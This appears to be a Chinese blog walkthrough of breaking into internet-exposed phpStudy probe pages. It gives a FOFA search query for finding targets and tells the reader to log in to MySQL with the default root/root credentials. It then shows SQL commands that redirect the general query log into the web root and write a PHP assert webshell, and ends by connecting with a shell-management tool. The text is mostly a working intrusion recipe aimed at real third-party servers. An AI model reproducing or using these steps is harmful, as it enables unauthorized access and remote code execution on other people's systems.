php探针到上线的全过程

今天研究点比较low的东西,比如php探针到上线,哈哈哈哈,水起来

这个也是看到别的大佬的文章,然后自己去做了一遍发现可行,过程比较简单,由于个人安全问题,下面放出的过程不会很完整。

第一还是要去搜索一个php探针,body="phpstudy探针" && title="phpStudy 探针 2014"(fofa真牛鼻)

然后随便找一个,拉到最下面,root/root尝试连接mysql

php探针到上线的全过程

 

 

 

php探针到上线的全过程

出现上面那个图片那就很完美了,然后我们这样:

php探针到上线的全过程

 

 访问到这个url然后,就可以开始操作了。

show variables like 'general_log'; -- 查看日志是否开启

set global general_log=on; -- 开启日志功能

show variables like 'general_log_file'; -- 看看日志文件保存位置

set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置

show variables like 'log_output'; -- 看看日志输出类型 table或file

set global log_output='table'; -- 设置输出类型为 table

set global log_output='file'; -- 设置输出类型为file

 

 

 两条命令搞定一切:

第一条:set global general_log=on;

第二条:set global general_log_file='tmp/general.lg';   logfile的是网站绝对路径,比如d:/www/xxx.php

设置完之后,就可以写一个webshell了

select'<?php assert($_POST["cmd"]);?>';

当你select之后就会产生日志,存放到那个log文件中

使用shell管理工具就可以进行链接了。

 

上一篇:GPO - General GPO Settings(3)


下一篇:phpmyadmin渗透拿webshell